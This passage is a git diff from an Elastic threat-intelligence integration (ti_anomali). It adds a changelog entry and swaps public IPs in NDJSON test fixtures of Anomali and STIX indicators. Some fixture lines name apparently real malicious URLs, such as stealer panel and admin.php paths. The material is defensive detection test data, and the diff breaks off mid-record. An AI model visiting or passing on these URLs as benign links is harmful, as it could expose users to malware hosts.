"resource_uri": "/api/v1/intelligence/P37263483140/", "source_feed_id": 3903, "date_first": "2020-10-09T18:34:53", "date_last": "2020-10-09T18:34:53", "md5": "c3b497"} +{"confidence": 20, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "196,775", "update_id": 2946803375, "detail": "", "id": 3346530445, "source": "Default Organization", "state": "active", "detail2": "imported by user 298", "maltype": "malware:jfje", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P10248765051/", "source_feed_id": 1239, "date_first": "2020-10-09T18:34:53", "date_last": "2020-10-09T18:34:53", "md5": "ec57713c"} +{"confidence": -1, "itype": "phish_url", "severity": "high", "classification": "public", "srcip": "89.160.20.156", "country": "US", "update_id": 1687817836, "detail": "-g6", "id": 2804727563, "source": "Default Organization", "state": "active", "detail2": "imported by user 345", "url": "https://lzr6.example.org/a7og/4vpv?e7k5=wun", "trusted_circle_ids": "793,131", "lat": -16.1, "maltype": "malware:c7e", "value_type": "url", "source_feed_id": 2617, "date_first": "2020-10-09T18:34:54", "date_last": "2020-10-09T18:34:54", "resource_uri": "/api/v1/intelligence/P11093591971/"} +{"confidence": 84, "itype": "mal_md5", "severity": "very-high", "classification": "public", "trusted_circle_ids": "30", "update_id": 2339220849, "detail": "", "id": 2229747614, "source": "Default Organization", "state": "active", "detail2": "imported by user 747", "maltype": "malware:0d7cxf", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P12084157836/", "source_feed_id": 1620, "date_first": "2020-10-09T18:34:55", "date_last": "2020-10-09T18:34:55", "md5": "bde"} +{"confidence": 54, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "908", "update_id": 2083515068, "detail": "", "id": 2821279948, "source": "Default Organization", "state": "active", "detail2": "imported by user 832", "maltype": "malware:-farvj0e", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P43981956471/", "source_feed_id": 2038, "date_first": "2020-10-09T18:35:01", "date_last": "2020-10-09T18:35:01", "md5": "aa674f5f"} +{"confidence": 63, "itype": "mal_md5", "severity": "high", "classification": "public", "trusted_circle_ids": "207,993,501", "update_id": 3429396478, "detail": "", "id": 3118884222, "source": "Default Organization", "state": "active", "detail2": "imported by user 217", "maltype": "malware:23xfw4nyi", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P20451120036/", "source_feed_id": 1492, "date_first": "2020-10-09T18:35:01", "date_last": "2020-10-09T18:35:01", "md5": "48721c98"} +{"confidence": 72, "itype": "phish_url", "severity": "low", "classification": "public", "srcip": "89.160.20.156", "country": "US", "update_id": 3320773285, "detail": "y7d71", "id": 3912225830, "source": "Default Organization", "state": "active", "detail2": "imported by user 402", "url": "http://932.example.com/1xmdjyom/tf3inx1?s6zgr=ajgw", "trusted_circle_ids": "439", "lat": -57.9, "maltype": "malware:dto", "value_type": "url", "source_feed_id": 1594, "date_first": "2020-10-09T18:35:04", "date_last": "2020-10-09T18:35:04", "resource_uri": "/api/v1/intelligence/P16185398807/"} +{"confidence": 34, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "669", "update_id": 2275758319, "detail": "nknea,hlq", "id": 2591984894, "source": "Default Organization", "state": "active", "detail2": "imported by user 626", "maltype": "malware:7nq6far", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P19612019110/", "source_feed_id": 1579, "date_first": "2020-10-09T18:35:06", "date_last": "2020-10-09T18:35:06", "md5": "114bd63e0"} +{"confidence": 53, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "835,850", "update_id": 2399518196, "detail": "", "id": 2589012476, "source": "Default Organization", "state": "active", "detail2": "imported by user 756", "maltype": "malware:c1z0qya", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P47658489795/", "source_feed_id": 3665, "date_first": "2020-10-09T18:35:22", "date_last": "2020-10-09T18:35:22", "md5": "636cd4267"} +{"confidence": 57, "itype": "mal_url", "severity": "low", "classification": "private", "srcip": "89.160.20.156", "country": "US", "update_id": 3342338979, "detail": "first_seen=2020-11-24T05:32:17,IP=192.168.2.45,5z6,0p0m1,mask=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6,popularity=high", "id": 2677187012, "source": "Default Organization", "state": "active", "detail2": "imported by user 893", "url": "https://0te9x75e.example.net/y2cbl5ov5/u-s9?vhppw120=bt0ze0du3", "trusted_circle_ids": "234,909", "lat": -45.9, "maltype": "malware:qtp", "value_type": "url", "source_feed_id": 3395, "date_first": "2020-10-09T18:44:01", "date_last": "2020-10-09T18:44:01", "resource_uri": "/api/v1/intelligence/P28161033466/"} +{"confidence": 31, "itype": "phish_url", "severity": "medium", "classification": "private", "srcip": "89.160.20.156", "country": "US", "update_id": 1484831936, "detail": "06epx", "id": 3137219963, "source": "Default Organization", "state": "active", "detail2": "imported by user 450", "url": "http://b7qdtnl8f.example.org/z2a-tx3ip/7cv?9a67ct3mb=ijse", "trusted_circle_ids": "755,843,943", "lat": -36.1, "maltype": "malware:nosy8", "value_type": "url", "source_feed_id": 2108, "date_first": "2020-10-09T18:44:04", "date_last": "2020-10-09T18:44:04", "resource_uri": "/api/v1/intelligence/P33588463803/"} +{"confidence": 19, "itype": "mal_domain", "severity": "very-high", "classification": "private", "trusted_circle_ids": "63,324", "update_id": 1826833096, "detail": "n5okkr7mg,jjz8e", "id": 2506436592, "source": "Default Organization", "state": "active", "detail2": "imported by user 479", "domain": "4gtq1n.example.net", "maltype": "malware:4okr", "value_type": "domain", "source_feed_id": 393, "date_first": "2020-10-09T18:44:19", "date_last": "2020-10-09T18:44:19", "resource_uri": "/api/v1/intelligence/P42606732542/"} +{"confidence": 83, "itype": "mal_ip", "severity": "very-high", "classification": "public", "srcip": "192.168.2.17", "country": "RU", "update_id": 2101635974, "detail": "first_seen=2020-02-14T13:46:51,IP=89.160.20.156,gnz6,u96h,mask=89.160.20.156,popularity=high", "id": 1214135687, "source": "Default Organization", "state": "active", "detail2": "imported by user 969", "trusted_circle_ids": "474,324", "lat": -68.4, "maltype": "malware:h68c70o", "value_type": "ip", "source_feed_id": 425, "date_first": "2020-10-09T18:44:27", "date_last": "2020-10-09T18:44:27", "resource_uri": "/api/v1/intelligence/P25206292349/"} +{"confidence": 15, "itype": "phish_url", "severity": "very-high", "classification": "private", "srcip": "192.168.2.183", "country": "US", "update_id": 1949050295, "detail": "t37z5d2", "id": 1632578144, "source": "Default Organization", "state": "active", "detail2": "imported by user 501", "url": "https://tfva.example.org/iih3qkj/b04g7?dwosh0qmt=wi9ao", "trusted_circle_ids": "615,818", "lat": 37.5, "maltype": "malware:y9xovpr2", "value_type": "url", "source_feed_id": 1114, "date_first": "2020-10-09T18:44:35", "date_last": "2020-10-09T18:44:35", "resource_uri": "/api/v1/intelligence/P21633460934/"} +{"confidence": 85, "itype": "phish_url", "severity": "medium", "classification": "public", "srcip": "89.160.20.156", "country": "US", "update_id": 2645963867, "detail": "rprsi-", "id": 3098969355, "source": "Default Organization", "state": "active", "detail2": "imported by user 149", "url": "https://erg2.example.com/4ys/vywa93c?7oru=evpi", "trusted_circle_ids": "597,946,913", "lat": -34.5, "maltype": "malware:wxbuhcov9", "value_type": "url", "source_feed_id": 398, "date_first": "2020-10-09T18:44:36", "date_last": "2020-10-09T18:44:36", "resource_uri": "/api/v1/intelligence/P30134520108/"} +{"confidence": 64, "itype": "mal_url", "severity": "low", "classification": "private", "srcip": "89.160.20.156", "country": "IN", "update_id": 2806149730, "detail": "first_seen=2020-12-24T20:20:31,IP=89.160.20.156,gogpcno,-jj,mask=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6,popularity=low", "id": 2035701780, "source": "Default Organization", "state": "active", "detail2": "imported by user 59", "url": "https://0elz6c.example.com/3nhx/cadsn6?kfcj94=gnl", "trusted_circle_ids": "600,673,990", "lat": -54.6, "maltype": "malware:xn2a", "value_type": "url", "source_feed_id": 2760, "date_first": "2020-10-09T18:44:37", "date_last": "2020-10-09T18:44:37", "resource_uri": "/api/v1/intelligence/P10508749376/"} +{"confidence": 44, "itype": "phish_url", "severity": "medium", "classification": "public", "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "country": "US", "update_id": 3490786662, "detail": "qztcai", "id": 2120958409, "source": "Default Organization", "state": "active", "detail2": "imported by user 134", "url": "https://6i0-utr.example.com/hsv/50qcugwt?xcl=ofr", "trusted_circle_ids": "125,279,552", "lat": -14.9, "maltype": "malware:cu6f11gp1", "value_type": "url", "source_feed_id": 1973, "date_first": "2020-10-09T18:44:45", "date_last": "2020-10-09T18:44:45", "resource_uri": "/api/v1/intelligence/P46535027346/"} +{"confidence": 94, "itype": "mal_ip", "severity": "high", "classification": "private", "srcip": "89.160.20.156", "country": "CN", "update_id": 2750333841, "detail": "first_seen=2020-11-23T17:11:50,IP=89.160.20.156,ail6s,q0n,mask=89.160.20.156,popularity=medium", "id": 1139990065, "source": "Default Organization", "state": "active", "detail2": "imported by user 914", "trusted_circle_ids": "610,346", "lat": -73.5, "maltype": "malware:9pyy91p7", "value_type": "ip", "source_feed_id": 2363, "date_first": "2020-10-09T18:44:47", "date_last": "2020-10-09T18:44:47", "resource_uri": "/api/v1/intelligence/P20277063326/"} +{"confidence": 69, "itype": "mal_domain", "severity": "medium", "classification": "public", "srcip": "89.160.20.156", "country": "HK", "update_id": 3315952704, "detail": "first_seen=2020-03-11T09:04:13,smh,0a3p,mask=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6,popularity=high", "id": 2453026318, "source": "Default Organization", "state": "active", "detail2": "imported by user 886", "domain": "ztpyt.example.org", "trusted_circle_ids": "391", "lat": -44.3, "maltype": "malware:c0-a", "value_type": "domain", "source_feed_id": 1281, "date_first": "2020-10-09T18:44:50", "date_last": "2020-10-09T18:44:50", "resource_uri": "/api/v1/intelligence/P26988858868/"} +{"confidence": 88, "itype": "mal_url", "severity": "very-high", "classification": "private", "url": "http://e5el.example.net/rncer/fky?8tc53bbz=1pd-6w5", "trusted_circle_ids": "806,75,258", "update_id": 3898530792, "detail": "first_seen=2020-07-17T00:42:30,sv5lmqoo,mdedohd,mask=192.168.2.22,popularity=high", "id": 3554643386, "source": "Default Organization", "state": "active", "detail2": "imported by user 268", "maltype": "malware:ai7s5vg01", "value_type": "url", "source_feed_id": 744, "date_first": "2020-10-09T18:44:50", "date_last": "2020-10-09T18:44:50", "resource_uri": "/api/v1/intelligence/P48225335605/"} +{"confidence": 73, "itype": "phish_url", "severity": "low", "classification": "private", "srcip": "192.168.2.226", "country": "US", "update_id": 1423149268, "detail": "l019r8", "id": 2781657405, "source": "Default Organization", "state": "active", "detail2": "imported by user 737", "url": "http://eryz36i.example.net/9a86hdj/zti5r9fx?ahz=l7dsg01qo", "trusted_circle_ids": "259", "lat": -14.3, "maltype": "malware:6faja4zy-", "value_type": "url", "source_feed_id": 518, "date_first": "2020-10-09T18:44:54", "date_last": "2020-10-09T18:44:54", "resource_uri": "/api/v1/intelligence/P13788530147/"} +{"confidence": 22, "itype": "phish_url", "severity": "medium", "classification": "private", "srcip": "192.168.2.25", "country": "US", "update_id": 2621256767, "detail": "4yqbj3b", "id": 1875325904, "source": "Default Organization", "state": "active", "detail2": "imported by user 703", "url": "http://i-pb.example.com/pjmy3/w0tgzb?noe1pr9=eiwcfihd", "trusted_circle_ids": "802,792,114", "lat": -67.0, "maltype": "malware:rrcnb", "value_type": "url", "source_feed_id": 417, "date_first": "2020-10-09T18:44:58", "date_last": "2020-10-09T18:44:58", "resource_uri": "/api/v1/intelligence/P12535858975/"} +{"confidence": 19, "itype": "mal_ip", "severity": "very-high", "classification": "public", "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "country": "IN", "update_id": 1171583779, "detail": "first_seen=2020-12-01T02:16:04,IP=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6,qqo5fg,j6vwgb6,mask=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6,popularity=medium", "id": 2684776210, "source": "Default Organization", "state": "active", "detail2": "imported by user 846", "trusted_circle_ids": "697,641", "lat": 47.5, "maltype": "malware:zfd", "value_type": "ip", "source_feed_id": 965, "date_first": "2020-10-09T18:45:05", "date_last": "2020-10-09T18:45:05", "resource_uri": "/api/v1/intelligence/P45743905551/"} +{"itype": "mal_ip", "classification": "public", "lat": 5.6, "update_id": 3651210157, "maltype": "malware:ib0ezg", "source_feed_id": 632, "date_first": "2021-04-07T13:10:07", "confidence": 14, "severity": "low", "trusted_circle_ids": "459,936", "lon": 112.8, "id": 1705726884, "source": "Default Organization", "state": "active", "import_session_id": 2813, "value_type": "ip", "srcip": "192.168.2.12", "org": "Level 3 Communications", "asn": "3356", "date_last": "2021-04-19T08:57:46", "country": "US", "detail2": "imported by user 812", "resource_uri": "/api/v1/intelligence/P12586136986/"} +{"confidence": 81, "itype": "apt_ip", "severity": "very-high", "classification": "private", "trusted_circle_ids": "474,601", "id": 1502608684, "source": "Default Organization", "state": "active", "detail2": "imported by user 411", "srcip": "89.160.20.156", "update_id": 1170853028, "value_type": "ip", "source_feed_id": 2891, "date_first": "2021-04-29T16:02:17", "date_last": "2021-04-29T16:02:17", "resource_uri": "/api/v1/intelligence/P46655498126/"} +{"confidence": 14, "itype": "ssh_ip", "severity": "medium", "classification": "private", "trusted_circle_ids": "749", "id": 1171635730, "source": "Default Organization", "state": "active", "detail2": "imported by user 601", "srcip": "192.168.2.68", "update_id": 1026394470, "value_type": "ip", "source_feed_id": 822, "date_first": "2021-04-29T16:02:23", "date_last": "2021-04-29T16:02:23", "resource_uri": "/api/v1/intelligence/P24647878518/"} +{"confidence": 70, "itype": "i2p_ip", "severity": "medium", "classification": "public", "trusted_circle_ids": "630,235", "id": 2251817936, "source": "Default Organization", "state": "active", "detail2": "imported by user 964", "srcip": "89.160.20.156", "update_id": 3118045359, "value_type": "ip", "source_feed_id": 3194, "date_first": "2021-04-29T16:02:24", "date_last": "2021-04-29T16:02:24", "resource_uri": "/api/v1/intelligence/P47421535249/"} +{"confidence": 77, "itype": "parked_ip", "severity": "low", "classification": "public", "trusted_circle_ids": "303,461", "id": 1966380326, "source": "Default Organization", "state": "active", "detail2": "imported by user 137", "srcip": "89.160.20.156", "update_id": 1757326916, "value_type": "ip", "source_feed_id": 229, "date_first": "2021-04-29T16:02:25", "date_last": "2021-04-29T16:02:25", "resource_uri": "/api/v1/intelligence/P19479436344/"} +{"confidence": 14, "itype": "tor_ip", "severity": "medium", "classification": "private", "trusted_circle_ids": "657,879,13", "id": 3377960871, "source": "Default Organization", "state": "active", "detail2": "imported by user 997", "srcip": "192.168.2.239", "update_id": 1469037378, "value_type": "ip", "source_feed_id": 1710, "date_first": "2021-04-29T16:02:25", "date_last": "2021-04-29T16:02:25", "resource_uri": "/api/v1/intelligence/P25503355951/"} +{"confidence": 12, "itype": "c2_ip", "severity": "high", "classification": "public", "trusted_circle_ids": "683,719", "update_id": 1541655552, "detail": "vjb9lmpcf", "id": 1049633552, "source": "Default Organization", "state": "active", "detail2": "imported by user 445", "srcip": "192.168.2.169", "maltype": "malware:tos5xne", "value_type": "ip", "source_feed_id": 274, "date_first": "2021-04-29T16:02:26", "date_last": "2021-04-29T16:02:26", "resource_uri": "/api/v1/intelligence/P17175297976/"} diff --git a/packages/ti_anomali/changelog.yml b/packages/ti_anomali/changelog.yml index 353770a4523..d1843399aea 100644 --- a/packages/ti_anomali/changelog.yml +++ b/packages/ti_anomali/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.2" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.1.1" changes: - description: Fixing typo in base-fields.yml diff --git a/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log b/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log index 28d5b256ea9..bd86247666f 100644 --- a/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log +++ b/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log @@ -1,18 +1,18 @@ {"created":"2020-01-22T02:58:57.431Z","description":"TS ID: 55241332361; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--44c85d4f-45ca-4977-b693-c810bbfb7a28","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-22T02:58:57.431Z","name":"mal_url: http://chol.cc/Work6/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://chol.cc/Work6/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T02:58:57.431Z"} {"created":"2020-01-22T02:58:57.503Z","description":"TS ID: 55241332307; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--f9fe5c81-6869-4247-af81-62b7c8aba209","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-01-22T02:58:57.503Z","name":"mal_url: http://worldatdoor.in/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T02:58:57.503Z"} {"created":"2020-01-22T02:58:57.57Z","description":"TS ID: 55241332302; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--b0e14122-9005-4776-99fc-00872476c6d1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-01-22T02:58:57.57Z","name":"mal_url: http://f0387770.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0387770.xsph.ru/login']","type":"indicator","valid_from":"2020-01-22T02:58:57.57Z"} -{"created":"2020-01-22T02:58:59.366Z","description":"TS ID: 55241332312; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime","id":"indicator--111ec76f-616d-4aa8-80fd-e11ef0066aba","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-50"],"modified":"2020-01-22T02:58:59.366Z","name":"mal_url: http://178.62.187.103/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://178.62.187.103/login']","type":"indicator","valid_from":"2020-01-22T02:58:59.366Z"} +{"created":"2020-01-22T02:58:59.366Z","description":"TS ID: 55241332312; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime","id":"indicator--111ec76f-616d-4aa8-80fd-e11ef0066aba","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-50"],"modified":"2020-01-22T02:58:59.366Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-22T02:58:59.366Z"} {"created":"2020-01-22T02:58:59.457Z","description":"TS ID: 55241332386; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--189ce776-6d7e-4e85-9222-de5876644988","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-66"],"modified":"2020-01-22T02:58:59.457Z","name":"mal_url: http://appareluea.com/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://appareluea.com/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T02:58:59.457Z"} {"created":"2020-01-22T02:59:06.402Z","description":"TS ID: 55241332391; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--a4144d34-b86d-475e-8047-eb46b48ee325","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-22T02:59:06.402Z","name":"mal_url: http://nkpotu.xyz/Kpot3/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nkpotu.xyz/Kpot3/login.php']","type":"indicator","valid_from":"2020-01-22T02:59:06.402Z"} -{"created":"2020-01-22T02:59:19.99Z","description":"TS ID: 55241332372; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime","id":"indicator--983d9c3d-b7f8-4345-b643-b1d18e6ac6b2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-49"],"modified":"2020-01-22T02:59:19.99Z","name":"mal_ip: 162.144.128.116","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '162.144.128.116']","type":"indicator","valid_from":"2020-01-22T02:59:19.99Z"} +{"created":"2020-01-22T02:59:19.99Z","description":"TS ID: 55241332372; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime","id":"indicator--983d9c3d-b7f8-4345-b643-b1d18e6ac6b2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-49"],"modified":"2020-01-22T02:59:19.99Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-22T02:59:19.99Z"} {"created":"2020-01-22T02:59:20.155Z","description":"TS ID: 55241332313; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--f9c6386b-dba2-41f9-8160-d307671e5c8e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-01-22T02:59:20.155Z","name":"mal_url: http://ntrcgroup.com/nze/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ntrcgroup.com/nze/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T02:59:20.155Z"} {"created":"2020-01-22T02:59:25.521Z","description":"TS ID: 55241332350; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--98fad53e-5389-47f7-a3ff-44d334af2d6b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-22T02:59:25.521Z","name":"mal_url: http://chol.cc/Work8/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://chol.cc/Work8/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T02:59:25.521Z"} {"created":"2020-01-22T02:59:25.626Z","description":"TS ID: 55241332291; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--76c01735-fb76-463d-9609-9ea3aedf3f4f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-01-22T02:59:25.626Z","name":"mal_url: http://f0390764.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0390764.xsph.ru/login']","type":"indicator","valid_from":"2020-01-22T02:59:25.626Z"} -{"created":"2020-01-22T02:59:36.461Z","description":"TS ID: 55241332343; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--e0a812dc-63c8-4949-b038-2241b2dbfcdc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-01-22T02:59:36.461Z","name":"mal_ip: 45.143.138.39","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '45.143.138.39']","type":"indicator","valid_from":"2020-01-22T02:59:36.461Z"} +{"created":"2020-01-22T02:59:36.461Z","description":"TS ID: 55241332343; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--e0a812dc-63c8-4949-b038-2241b2dbfcdc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-01-22T02:59:36.461Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-22T02:59:36.461Z"} {"created":"2020-01-22T02:59:41.193Z","description":"TS ID: 55241332316; iType: mal_url; State: active; Org: Sksa Technology Sdn Bhd; Source: CyberCrime","id":"indicator--6f0d8607-21cb-4738-9712-f4fd91a37f7d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-22T02:59:41.193Z","name":"mal_url: http://aglfreight.com.my/inc/js/jstree/biu/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://aglfreight.com.my/inc/js/jstree/biu/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T02:59:41.193Z"} -{"created":"2020-01-22T02:59:41.228Z","description":"TS ID: 55241332284; iType: mal_url; State: active; Org: Oltelecom Jsc; Source: CyberCrime","id":"indicator--c649d6d4-87c4-4b76-bfc2-75a509ccb187","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-01-22T02:59:41.228Z","name":"mal_url: http://95.182.122.184/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://95.182.122.184/']","type":"indicator","valid_from":"2020-01-22T02:59:41.228Z"} -{"created":"2020-01-22T02:59:51.313Z","description":"TS ID: 55241332337; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--408ebd2d-063f-4646-b2e7-c00519869736","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-01-22T02:59:51.313Z","name":"mal_ip: 198.54.115.121","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '198.54.115.121']","type":"indicator","valid_from":"2020-01-22T02:59:51.313Z"} -{"created":"2020-01-22T02:59:51.372Z","description":"TS ID: 55241332324; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--e1d215cb-c7a5-40e0-bc53-8f92a2bcaba8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-38"],"modified":"2020-01-22T02:59:51.372Z","name":"mal_ip: 192.185.119.172","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.185.119.172']","type":"indicator","valid_from":"2020-01-22T02:59:51.372Z"} +{"created":"2020-01-22T02:59:41.228Z","description":"TS ID: 55241332284; iType: mal_url; State: active; Org: Oltelecom Jsc; Source: CyberCrime","id":"indicator--c649d6d4-87c4-4b76-bfc2-75a509ccb187","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-01-22T02:59:41.228Z","name":"mal_url: http://89.160.20.156/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/']","type":"indicator","valid_from":"2020-01-22T02:59:41.228Z"} +{"created":"2020-01-22T02:59:51.313Z","description":"TS ID: 55241332337; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--408ebd2d-063f-4646-b2e7-c00519869736","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-01-22T02:59:51.313Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-22T02:59:51.313Z"} +{"created":"2020-01-22T02:59:51.372Z","description":"TS ID: 55241332324; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--e1d215cb-c7a5-40e0-bc53-8f92a2bcaba8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-38"],"modified":"2020-01-22T02:59:51.372Z","name":"mal_ip: 192.168.119.172","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.168.119.172']","type":"indicator","valid_from":"2020-01-22T02:59:51.372Z"} {"created":"2020-01-22T02:59:51.442Z","description":"TS ID: 55241332296; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--6f3a4a2b-62e3-48ef-94ae-70103f09cf7e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-01-22T02:59:51.442Z","name":"mal_url: http://f0389246.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0389246.xsph.ru/login']","type":"indicator","valid_from":"2020-01-22T02:59:51.442Z"} {"created":"2020-01-22T03:00:01.563Z","description":"TS ID: 55241332400; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--213519c9-f511-4188-89c8-159f35f08008","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-66"],"modified":"2020-01-22T03:00:01.563Z","name":"mal_url: http://appareluea.com/server/cp.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://appareluea.com/server/cp.php']","type":"indicator","valid_from":"2020-01-22T03:00:01.563Z"} {"created":"2020-01-22T03:00:03.138Z","description":"TS ID: 55241332396; iType: mal_url; State: active; Org: Cloudflare; Source: 